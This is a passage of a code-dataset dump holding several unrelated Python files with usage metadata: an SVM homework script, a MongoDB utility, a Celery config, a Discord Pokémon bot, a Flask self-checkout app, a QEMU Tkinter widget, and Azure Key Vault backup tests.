"call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "chat_pb2.Value", "line_number": 88, "usage_type": "call"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "grpc.server", "line_number": 104, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 104, "usage_type": "call"}, {"api_name": "concurrent.futures", "line_number": 104, "usage_type": "name"}, {"api_name": "chat_pb2_grpc.add_GreeterServicer_to_server", "line_number": 105, "usage_type": "call"}, {"api_name": "chat_pb2_grpc.add_CalcServicer_to_server", "line_number": 106, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "getopt.getopt", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}]}
+{"seq_id": "278135300", "text": "# -*- coding: utf-8 -*-\n\nimport csv\nimport cvxpy as cp\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntrain_data =[]\nwith open(\"hw04_sample_vectors.csv\", \"r\") as csv_file:\n reader = csv.reader(csv_file, delimiter=',') \n for data in reader:\n train_data.append(data) \ncsv_file.close()\n\nlabel =[]\nwith open(\"hw04_labels.csv\", \"r\") as csv_file: \n reader = csv.reader(csv_file, delimiter=',') \n for data in reader:\n label.append(data) \ncsv_file.close()\n\nfor data in label:\n if np.linalg.norm(data) == 0:\n data[0] = -1\n \nx2 = np.arange(-0.6, 0.4, 0.01)\n \ndef plot_graph(name, omega, omega_0):\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.scatter(train_data[:1000, 0], train_data[:1000, 1], c='b', s=3)\n ax1.scatter(train_data[1000:, 0], train_data[1000:, 1], c='r', s=3)\n x1 = (-1*omega[1]*x2 - omega_0) / omega[0]\n ax1.plot(x1, x2, 'g-')\n ax1.set_xlabel('x1')\n ax1.set_ylabel('x2')\n fig.savefig('hw4_2_c_{}.pdf'.format(name))\n \nlabel = np.asarray(label, dtype=np.float32)\ntrain_data = np.asarray(train_data, dtype=np.float32)\n#one_arr = np.ones(train_data.shape[0])\n#one_arr = np.resize(one_arr, (train_data.shape[0], 1))\n#train_data = np.concatenate((train_data, one_arr), axis=1)\n\nomega = cp.Variable(2)\nomega_0 = cp.Variable(1)\n\nobjective = cp.Minimize(cp.norm(omega))\nconstraints = [label[i] * (omega.T * train_data[i] + omega_0) >= 1 \n for i in range(len(label))]\nprob = cp.Problem(objective, constraints)\n\nresult = prob.solve()\n\nprint(omega.value)\nprint(omega_0.value)\n\nplot_graph('1', omega.value, omega_0.value)", "sub_path": "ECE59500/hw4/svm_hard.py", "file_name": "svm_hard.py", "file_ext": "py", "file_size_in_byte": 1649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "csv.reader", "line_number": 10, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cvxpy.Variable", "line_number": 45, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 46, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 48, "usage_type": "call"}, {"api_name": "cvxpy.norm", "line_number": 48, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "573722788", "text": "import json, os\nfrom bson import ObjectId, Regex\n\n\nclass Utils:\n\n def __init__(self, db):\n self.db = db\n\n def store_ids(self, admin_email, id_list):\n\n self.db.files.update(\n {'admin_email': admin_email},\n {'admin_email': admin_email, 'id_list': id_list},\n upsert=True\n )\n\n def remove_ids(self, email):\n\n print('--remove_ids--')\n\n obj = self.db.files.find_one({\"admin_email\": email})\n \n print(obj)\n if obj:\n\n col_names = self.db.collection_names()\n\n print(obj)\n\n if col_names:\n\n for name in col_names:\n\n for id in obj['id_list']:\n\n try:\n self.db[name].delete_one({\n '_id': ObjectId(id)\n })\n\n print('Deleted %s : %s' % (name, id))\n\n except:\n pass\n\n # self.db.files.remove({'_id': ObjectId(obj['_id'])})\n # x = self.db.users.remove({'email': obj['admin_email']})\n # print(x)\n", "sub_path": "api_gateway/api/models/Utils.py", "file_name": "Utils.py", "file_ext": "py", "file_size_in_byte": 1154, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "bson.ObjectId", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "168471545", "text": "from __future__ import absolute_import\nfrom django.conf import settings\nfrom celery.utils.log import get_task_logger\n\nfrom biostar import const\nfrom datetime import timedelta\n\nlogger = get_task_logger(__name__)\n\nfrom celery import Celery\n\napp = Celery('biostar')\n\n# Read the configuration from the config file.\napp.config_from_object(settings.CELERY_CONFIG)\n\n# Discover tasks in applications.\napp.autodiscover_tasks(\n lambda: [\"biostar.mailer\"]\n)\n\n@app.task\ndef data_cleanup(days=1, weeks=20):\n \"Reduces messages and post views\"\n\n from biostar.apps.posts.models import PostView\n from biostar.apps.messages.models import Message\n\n # Reduce post views.\n past = const.now() - timedelta(days=days)\n query = PostView.objects.filter(date__lt=past)\n msg = \"Deleting %s PostViews\" % query.count()\n logger.info(msg)\n query.delete()\n\n # Reduce messages.\n since = const.now() - timedelta(weeks=weeks)\n query = Message.objects.filter(sent_at__lt=since)\n msg = \"Deleting %s messages\" % query.count()\n logger.info(msg)\n query.delete()\n\n\n@app.task\ndef test(*args, **kwds):\n logger.info(\"*** executing task %s %s, %s\" % (__name__, args, kwds))\n return 1000\n\n\n\n", "sub_path": "biostar/celery.py", "file_name": "celery.py", "file_ext": "py", "file_size_in_byte": 1198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "celery.utils.log.get_task_logger", "line_number": 8, "usage_type": "call"}, {"api_name": "celery.Celery", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.settings.CELERY_CONFIG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 15, "usage_type": "name"}, {"api_name": "biostar.const.now", "line_number": 30, "usage_type": "call"}, {"api_name": "biostar.const", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 30, "usage_type": "call"}, {"api_name": "biostar.apps.posts.models.PostView.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "biostar.apps.posts.models.PostView.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "biostar.apps.posts.models.PostView", "line_number": 31, "usage_type": "name"}, {"api_name": "biostar.const.now", "line_number": 37, "usage_type": "call"}, {"api_name": "biostar.const", "line_number": 37, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 37, "usage_type": "call"}, {"api_name": "biostar.apps.messages.models.Message.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "biostar.apps.messages.models.Message.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "biostar.apps.messages.models.Message", "line_number": 38, "usage_type": "name"}]}
+{"seq_id": "573980623", "text": "import os\nimport sys\nimport time\nfrom asyncio import sleep, ensure_future\n\nimport discord\nimport pandas as pd\nimport jaconv\n\n\nclass Pokemon(discord.Client):\n def __init__(self):\n super(Pokemon, self).__init__()\n\n self.table = pd.read_csv(\n './pokemon.tsv', sep='\\t', dtype=str\n ).fillna(\"\")\n self.table['No.str'] = \\\n self.table['No.'].apply(lambda x: f'No.{x}')\n\n self.table_moves = pd.read_csv(\n './pokemon_moves.tsv', sep='\\t', dtype=str\n ).fillna(\"\")\n self.table_moves_katakana_lower = \\\n self.table_moves.applymap(\n lambda name: jaconv.hira2kata(name.lower())\n )\n\n async def on_message(self, message):\n if len(message.content) == 0:\n return\n\n content = message.content.lower()\n content_normalized = jaconv.hira2kata(content[0].upper() + content[1:])\n\n if content_normalized == 'No.???':\n return\n\n # filter pokemon list\n match = self.table[\n self.table.drop(columns='No.').applymap(\n lambda name: name == content_normalized\n ).any(axis=1)\n ]\n if len(match) != 0:\n # display 1st pokemon of filtered list (expected that only 1 item has been extracted)\n match = match.drop(columns='No.str')\n matchseq = match.iloc[0]\n embed = format_pokeinfo(zip(matchseq.index, matchseq))\n await message.channel.send(embed=embed)\n\n # filter move(waza) list\n content_normalized_lower = content_normalized.lower()\n match_moves = self.table_moves[\n self.table_moves_katakana_lower.applymap(\n lambda name: name == content_normalized_lower\n ).any(axis=1)\n ]\n if len(match_moves) != 0:\n # display 1st move of filtered list (expected that only 1 item has been extracted)\n matchseq_moves = match_moves.iloc[0]\n embed = format_pokeinfo(zip(matchseq_moves.index, matchseq_moves))\n await message.channel.send(embed=embed)\n\n\ndef format_pokeinfo(index_value_seq):\n name_jp = 'NO DATA'\n description = ''\n for index, value in index_value_seq:\n if index in ['日', '🇯🇵']:\n if value == '':\n continue\n name_jp = value\n continue\n description += (\n f'{index} [NO DATA]\\n'\n if value == '' else\n f'{index} `{value}`\\n'\n )\n title = name_jp\n description = description[:-1]\n return discord.Embed(title=title, description=description)\n\n\nif __name__ == '__main__':\n print(\"sudawoodo has started\")\n poke = Pokemon()\n poke.run(os.getenv('DISCORD_BOT_TOKEN'))\n", "sub_path": "sudawoodo.py", "file_name": "sudawoodo.py", "file_ext": "py", "file_size_in_byte": 2761, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "discord.Client", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "jaconv.hira2kata", "line_number": 26, "usage_type": "call"}, {"api_name": "jaconv.hira2kata", "line_number": 34, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 82, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "141534568", "text": "import sys\n\nfrom flask import Flask, Response, request\nimport requests \nimport json\n\nfrom settings import *\n\n\nLOAN_XML = \"\"\"\n \n {}\n {}\n \n\"\"\".format(CIRC_DESK, LIB_NAME)\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef root():\n return app.send_static_file('self-check.html')\n\n\n@app.route('/login//')\ndef login(userid, lastname):\n url = \"{}/users/{}\".format(API_URL, userid)\n params = {}\n params['apiKey'] = API_KEY\n params['expand'] = \"loans,requests,fees\"\n params['format'] = \"json\"\n response = requests.get(url, params=params)\n if response.json().get(\"last_name\").lower() == lastname.lower():\n if response.status_code == 200:\n return Response(response, mimetype=\"application/json\")\n else:\n return Response('Incorrect Login
Try Again', 500)\n else:\n return Response('Incorrect Login
Try Again', 401)\n\n\n@app.route('/checkout//')\ndef loan(userid, barcode):\n # test to see if book is already checked out\n barcodeurl = \"{}/items\".format(API_URL)\n params = {'apiKey': API_KEY,\n 'item_barcode': barcode,\n 'format': 'json'}\n redirect = requests.get(barcodeurl, params=params, allow_redirects=True)\n url = redirect.url\n url, _ = url.split('?')\n url = '{}/loans'.format(url)\n\n # del params['item_barcode']\n loans_response = requests.get(url, params=params)\n already_checked_out = loans_response.json().get('item_loan', False)\n\n # error handling\n if already_checked_out:\n return Response('This item is already checked out', 409)\n if loans_response.status_code == 404:\n return Response('Error: Invalid Barcode', 404)\n\n # Checkout the item\n url = \"{}/users/{}/loans\".format(API_URL, userid)\n headers = {'Content-Type': 'application/xml', 'dataType': \"xml\"}\n response = requests.post(url, params=params, headers=headers, data=LOAN_XML)\n if response.status_code == 400 and \"reference\" in redirect.text.lower():\n return Response('Cannot Checkout: Reference Materials', 403)\n if response.status_code == 400 and \"non-circulating\" in redirect.text.lower():\n return Response('Cannot Checkout: Reserve Materials', 403)\n if response.status_code == 400 and \"loan limit\" in response.text.lower():\n return Response('Item cannot be loaned due to loan limit being reached', 411)\n return Response(response, mimetype=\"application/json\")\n\n\nif __name__ == \"__main__\":\n app.run()\n", "sub_path": "selfcheckout.py", "file_name": "selfcheckout.py", "file_ext": "py", "file_size_in_byte": 2595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 50, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 63, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "623738114", "text": "__all__ = [\n \"DeviceTreeWidget\"\n]\n\nfrom .var_widgets import (\n VarTreeview,\n VarButton,\n VarLabelFrame\n)\nfrom qemu import (\n qvd_get\n)\nfrom six.moves.tkinter_ttk import (\n Scrollbar\n)\nfrom six.moves.tkinter import (\n Radiobutton,\n StringVar\n)\nfrom common import (\n mlget as _\n)\nfrom .gui_dialog import (\n GUIDialog\n)\n\nclass DeviceTreeWidget(GUIDialog):\n def __init__(self, root, *args, **kw):\n GUIDialog.__init__(self, master = root, *args, **kw)\n self.qom_type_var = root.qom_type_var\n\n self.title(_(\"Device Tree\"))\n self.grid()\n \n self.columnconfigure(0, weight = 1)\n self.rowconfigure(0, weight = 1)\n\n self.columnconfigure(2, minsize = 200)\n\n self.attributes(\"-topmost\", 1)\n geom = \"+\" + str(int(root.winfo_rootx())) \\\n + \"+\" + str(int(root.winfo_rooty()))\n self.geometry(geom)\n\n self.focus()\n\n self.device_tree = VarTreeview(self)\n self.device_tree[\"columns\"] = (\"Macros\")\n\n self.device_tree.heading(\"#0\", text = _(\"Devices\"))\n self.device_tree.heading(\"Macros\", text = _(\"Macros\"))\n\n self.device_tree.bind(\"\", self.on_b1_press_dt)\n\n self.device_tree.grid(\n row = 0,\n column = 0,\n sticky = \"NEWS\"\n )\n\n #Add Scrollbar\n ysb = Scrollbar(self,\n orient = \"vertical\",\n command = self.device_tree.yview\n )\n xsb = Scrollbar(self,\n orient = \"horizontal\",\n command = self.device_tree.xview\n )\n self.device_tree['yscroll'] = ysb.set\n self.device_tree['xscroll'] = xsb.set\n ysb.grid(row = 0, column = 1, sticky = \"NS\")\n xsb.grid(row = 1, column = 0, sticky = \"EW\")\n\n self.add_button = VarButton(\n self,\n text = _(\"Select\"),\n command = self.on_select_qom_type\n )\n self.add_button.grid(row = 1, column = 2, sticky = \"WE\")\n self.add_button.config(state = \"disabled\")\n\n self.fr = VarLabelFrame(self, text = _(\"Select QOM type\"))\n self.fr.grid(row = 0, column = 2, sticky = \"SEWN\")\n\n # Check exception before __init__ call.\n bp = root.mach.project.build_path\n qvd = qvd_get(bp, version = root.mach.project.target_version)\n # the QOM type of roots[0] is \"device\"\n roots = qvd.qvc.device_tree[0][\"children\"]\n self.qom_create_tree(\"\", roots)\n\n def qom_create_tree(self, parent_id, dt_list):\n dt_list.sort(key = lambda x: x[\"type\"])\n for dict_dt in dt_list:\n if \"macro\" in dict_dt:\n value = \"\"\n for macro in dict_dt[\"macro\"]:\n value = value + \" \" + macro\n else:\n value= \"None\"\n tr_id = self.device_tree.insert(parent_id, \"end\",\n text = dict_dt[\"type\"],\n values = value\n )\n if \"children\" in dict_dt:\n self.qom_create_tree(tr_id, dict_dt[\"children\"])\n\n def on_select_qom_type(self):\n self.qom_type_var.set(self.v.get())\n self.destroy()\n\n # write selected qom type in qom_type_var\n def on_b1_press_dt(self, event):\n item = self.device_tree.identify('item', event.x, event.y)\n if item:\n self.add_button.config(state = \"active\")\n for widget in self.fr.winfo_children():\n widget.destroy()\n\n dt_type = self.device_tree.item(item, \"text\")\n self.v = StringVar()\n self.v.set(dt_type) # initialize\n\n b = Radiobutton(self.fr,\n text = dt_type, \n variable = self.v,\n value = dt_type\n )\n b.pack(anchor = \"w\")\n\n macros = self.device_tree.item(item, \"values\")[0]\n if not macros == \"None\":\n l = macros.split(\" \")\n for mstr in l:\n b = Radiobutton(\n self.fr,\n text = mstr, \n variable = self.v,\n value = mstr\n )\n b.pack(anchor = \"w\")\n\n b.select()\n", "sub_path": "widgets/device_tree_widget.py", "file_name": "device_tree_widget.py", "file_ext": "py", "file_size_in_byte": 4233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "gui_dialog.GUIDialog", "line_number": 27, "usage_type": "name"}, {"api_name": "gui_dialog.GUIDialog.__init__", "line_number": 29, "usage_type": "call"}, {"api_name": "gui_dialog.GUIDialog", "line_number": 29, "usage_type": "name"}, {"api_name": "common.mlget", "line_number": 32, "usage_type": "call"}, {"api_name": "var_widgets.VarTreeview", "line_number": 47, "usage_type": "call"}, {"api_name": "common.mlget", "line_number": 50, "usage_type": "call"}, {"api_name": "common.mlget", "line_number": 51, "usage_type": "call"}, {"api_name": "six.moves.tkinter_ttk.Scrollbar", "line_number": 62, "usage_type": "call"}, {"api_name": "six.moves.tkinter_ttk.Scrollbar", "line_number": 66, "usage_type": "call"}, {"api_name": "var_widgets.VarButton", "line_number": 75, "usage_type": "call"}, {"api_name": "common.mlget", "line_number": 77, "usage_type": "call"}, {"api_name": "var_widgets.VarLabelFrame", "line_number": 83, "usage_type": "call"}, {"api_name": "common.mlget", "line_number": 83, "usage_type": "call"}, {"api_name": "qemu.qvd_get", "line_number": 88, "usage_type": "call"}, {"api_name": "six.moves.tkinter.StringVar", "line_number": 122, "usage_type": "call"}, {"api_name": "six.moves.tkinter.Radiobutton", "line_number": 125, "usage_type": "call"}, {"api_name": "six.moves.tkinter.Radiobutton", "line_number": 136, "usage_type": "call"}]}
+{"seq_id": "74428294", "text": "# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom functools import partial\nimport time\n\nfrom azure.core.credentials import AccessToken\nfrom azure.core.exceptions import ResourceExistsError\nfrom azure.identity import DefaultAzureCredential\nfrom azure.keyvault.keys import KeyClient\nfrom azure.keyvault.administration._internal import HttpChallengeCache\nfrom azure.keyvault.administration import KeyVaultBackupClient\nfrom azure.keyvault.administration._internal import parse_folder_url\nfrom devtools_testutils import ResourceGroupPreparer, StorageAccountPreparer\nimport pytest\nfrom six.moves.urllib_parse import urlparse\n\nfrom _shared.helpers import mock\nfrom _shared.test_case import KeyVaultTestCase\nfrom blob_container_preparer import BlobContainerPreparer\n\n\n@pytest.mark.usefixtures(\"managed_hsm\")\nclass BackupClientTests(KeyVaultTestCase):\n def __init__(self, *args, **kwargs):\n super(BackupClientTests, self).__init__(*args, match_body=False, **kwargs)\n\n def setUp(self, *args, **kwargs):\n if self.is_live:\n real = urlparse(self.managed_hsm[\"url\"])\n playback = urlparse(self.managed_hsm[\"playback_url\"])\n self.scrubber.register_name_pair(real.netloc, playback.netloc)\n super(BackupClientTests, self).setUp(*args, **kwargs)\n\n def tearDown(self):\n HttpChallengeCache.clear()\n assert len(HttpChallengeCache._cache) == 0\n super(KeyVaultTestCase, self).tearDown()\n\n @property\n def credential(self):\n if self.is_live:\n return DefaultAzureCredential()\n return mock.Mock(get_token=lambda *_, **__: AccessToken(\"secret\", time.time() + 3600))\n\n @ResourceGroupPreparer(random_name_enabled=True, use_cache=True)\n @StorageAccountPreparer(random_name_enabled=True)\n @BlobContainerPreparer()\n def test_full_backup_and_restore(self, container_uri, sas_token):\n # backup the vault\n backup_client = KeyVaultBackupClient(self.managed_hsm[\"url\"], self.credential)\n backup_poller = backup_client.begin_backup(container_uri, sas_token)\n backup_operation = backup_poller.result()\n assert backup_operation.folder_url\n\n # restore the backup\n restore_poller = backup_client.begin_restore(backup_operation.folder_url, sas_token)\n restore_poller.wait()\n\n @ResourceGroupPreparer(random_name_enabled=True, use_cache=True)\n @StorageAccountPreparer(random_name_enabled=True)\n @BlobContainerPreparer()\n def test_full_backup_and_restore_rehydration(self, container_uri, sas_token):\n if not self.is_live:\n pytest.skip(\"Poller requests are incompatible with vcrpy in playback\")\n\n # backup the vault\n backup_client = KeyVaultBackupClient(self.managed_hsm[\"url\"], self.credential)\n backup_poller = backup_client.begin_backup(container_uri, sas_token)\n\n # create a new poller from a continuation token\n token = backup_poller.continuation_token()\n rehydrated = backup_client.begin_backup(container_uri, sas_token, continuation_token=token)\n\n rehydrated_operation = rehydrated.result()\n assert rehydrated_operation.folder_url\n backup_operation = backup_poller.result()\n assert backup_operation.folder_url == rehydrated_operation.folder_url\n\n # restore the backup\n restore_poller = backup_client.begin_restore(backup_operation.folder_url, sas_token)\n\n # create a new poller from a continuation token\n token = restore_poller.continuation_token()\n rehydrated = backup_client.begin_restore(backup_operation.folder_url, sas_token, continuation_token=token)\n\n rehydrated.wait()\n restore_poller.wait()\n\n @ResourceGroupPreparer(random_name_enabled=True, use_cache=True)\n @StorageAccountPreparer(random_name_enabled=True)\n @BlobContainerPreparer()\n def test_selective_key_restore(self, container_uri, sas_token):\n # create a key to selectively restore\n key_client = KeyClient(self.managed_hsm[\"url\"], self.credential)\n key_name = self.get_resource_name(\"selective-restore-test-key\")\n key_client.create_rsa_key(key_name)\n\n # backup the vault\n backup_client = KeyVaultBackupClient(self.managed_hsm[\"url\"], self.credential)\n backup_poller = backup_client.begin_backup(container_uri, sas_token)\n backup_operation = backup_poller.result()\n\n # restore the key\n restore_poller = backup_client.begin_restore(backup_operation.folder_url, sas_token, key_name=key_name)\n restore_poller.wait()\n\n # delete the key\n delete_function = partial(key_client.begin_delete_key, key_name)\n delete_poller = self._poll_until_no_exception(delete_function, ResourceExistsError)\n delete_poller.wait()\n key_client.purge_deleted_key(key_name)\n\n @ResourceGroupPreparer(random_name_enabled=True, use_cache=True)\n @StorageAccountPreparer(random_name_enabled=True)\n @BlobContainerPreparer()\n def test_backup_client_polling(self, container_uri, sas_token):\n if not self.is_live:\n pytest.skip(\"Poller requests are incompatible with vcrpy in playback\")\n\n # backup the vault\n backup_client = KeyVaultBackupClient(self.managed_hsm[\"url\"], self.credential)\n backup_poller = backup_client.begin_backup(container_uri, sas_token)\n\n # create a new poller from a continuation token\n token = backup_poller.continuation_token()\n rehydrated = backup_client.begin_backup(container_uri, sas_token, continuation_token=token)\n\n # check that pollers and polling methods behave as expected\n assert backup_poller.status() == \"InProgress\"\n assert not backup_poller.done() or backup_poller.polling_method().finished()\n assert rehydrated.status() == \"InProgress\"\n assert not rehydrated.done() or rehydrated.polling_method().finished()\n\n backup_operation = backup_poller.result()\n assert backup_poller.status() == \"Succeeded\" and backup_poller.polling_method().status() == \"Succeeded\"\n rehydrated_operation = rehydrated.result()\n assert rehydrated.status() == \"Succeeded\" and rehydrated.polling_method().status() == \"Succeeded\"\n assert backup_operation.folder_url == rehydrated_operation.folder_url\n\n # rehydrate a poller with a continuation token of a completed operation\n late_rehydrated = backup_client.begin_backup(container_uri, sas_token, continuation_token=token)\n assert late_rehydrated.status() == \"Succeeded\"\n\n # restore the backup\n restore_poller = backup_client.begin_restore(backup_operation.folder_url, sas_token)\n\n # create a new poller from a continuation token\n token = restore_poller.continuation_token()\n rehydrated = backup_client.begin_restore(backup_operation.folder_url, sas_token, continuation_token=token)\n\n # check that pollers and polling methods behave as expected\n assert restore_poller.status() == \"InProgress\"\n assert not restore_poller.done() or restore_poller.polling_method().finished()\n assert rehydrated.status() == \"InProgress\"\n assert not rehydrated.done() or rehydrated.polling_method().finished()\n\n rehydrated.wait()\n assert rehydrated.status() == \"Succeeded\" and rehydrated.polling_method().status() == \"Succeeded\"\n restore_poller.wait()\n assert restore_poller.status() == \"Succeeded\" and restore_poller.polling_method().status() == \"Succeeded\"\n\n\n@pytest.mark.parametrize(\n \"url,expected_container_url,expected_folder_name\",\n [\n (\n \"https://account.blob.core.windows.net/backup/mhsm-account-2020090117323313\",\n \"https://account.blob.core.windows.net/backup\",\n \"mhsm-account-2020090117323313\",\n ),\n (\"https://account.storage/account/storage\", \"https://account.storage/account\", \"storage\"),\n (\"https://account.storage/a/b/c\", \"https://account.storage/a\", \"b/c\"),\n (\"https://account.storage/a/b-c\", \"https://account.storage/a\", \"b-c\"),\n ],\n)\ndef test_parse_folder_url(url, expected_container_url, expected_folder_name):\n container_url, folder_name = parse_folder_url(url)\n assert container_url == expected_container_url\n assert folder_name == expected_folder_name\n", "sub_path": "sdk/keyvault/azure-keyvault-administration/tests/test_backup_client.py", "file_name": "test_backup_client.py", "file_ext": "py", "file_size_in_byte": 8407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "_shared.test_case.KeyVaultTestCase", "line_number": 25, "usage_type": "name"}, {"api_name": "six.moves.urllib_parse.urlparse", "line_number": 31, "usage_type": "call"}, {"api_name": "six.moves.urllib_parse.urlparse", "line_number": 32, "usage_type": "call"}, {"api_name": "azure.keyvault.administration._internal.HttpChallengeCache.clear", "line_number": 37, "usage_type": "call"}, {"api_name": "azure.keyvault.administration._internal.HttpChallengeCache", "line_number": 37, "usage_type": "name"}, {"api_name": "azure.keyvault.administration._internal.HttpChallengeCache._cache", "line_number": 38, "usage_type": "attribute"}, {"api_name": "azure.keyvault.administration._internal.HttpChallengeCache", "line_number": 38, "usage_type": "name"}, {"api_name": "_shared.test_case.KeyVaultTestCase", "line_number": 39, "usage_type": "argument"}, {"api_name": "azure.identity.DefaultAzureCredential", "line_number": 44, "usage_type": "call"}, {"api_name": "_shared.helpers.mock.Mock", "line_number": 45, "usage_type": "call"}, {"api_name": "_shared.helpers.mock", "line_number": 45, "usage_type": "name"}, {"api_name": "azure.core.credentials.AccessToken", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 45, "usage_type": "call"}, {"api_name": "azure.keyvault.administration.KeyVaultBackupClient", "line_number": 52, "usage_type": "call"}, {"api_name": "devtools_testutils.ResourceGroupPreparer", "line_number": 47, "usage_type": "call"}, {"api_name": "devtools_testutils.StorageAccountPreparer", "line_number": 48, "usage_type": "call"}, {"api_name": "blob_container_preparer.BlobContainerPreparer", "line_number": 49, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 66, "usage_type": "call"}, {"api_name": "azure.keyvault.administration.KeyVaultBackupClient", "line_number": 69, "usage_type": "call"}, {"api_name": "devtools_testutils.ResourceGroupPreparer", "line_number": 61, "usage_type": "call"}, {"api_name": "devtools_testutils.StorageAccountPreparer", "line_number": 62, "usage_type": "call"}, {"api_name": "blob_container_preparer.BlobContainerPreparer", "line_number": 63, "usage_type": "call"}, {"api_name": "azure.keyvault.keys.KeyClient", "line_number": 96, "usage_type": "call"}, {"api_name": "azure.keyvault.administration.KeyVaultBackupClient", "line_number": 101, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 110, "usage_type": "call"}, {"api_name": "azure.core.exceptions.ResourceExistsError", "line_number": 111, "usage_type": "argument"}, {"api_name": "devtools_testutils.ResourceGroupPreparer", "line_number": 91, "usage_type": "call"}, {"api_name": "devtools_testutils.StorageAccountPreparer", "line_number": 92, "usage_type": "call"}, {"api_name": "blob_container_preparer.BlobContainerPreparer", "line_number": 93, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 120, "usage_type": "call"}, {"api_name": "azure.keyvault.administration.KeyVaultBackupClient", "line_number": 123, "usage_type": "call"}, {"api_name": "devtools_testutils.ResourceGroupPreparer", "line_number": 115, "usage_type": "call"}, {"api_name": "devtools_testutils.StorageAccountPreparer", "line_number": 116, "usage_type": "call"}, {"api_name": "blob_container_preparer.BlobContainerPreparer", "line_number": 117, "usage_type": "call"}, {"api_name": "pytest.mark.usefixtures", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 24, "usage_type": "attribute"}, {"api_name": "azure.keyvault.administration._internal.parse_folder_url", "line_number": 179, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 165, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 165, "usage_type": "attribute"}]}
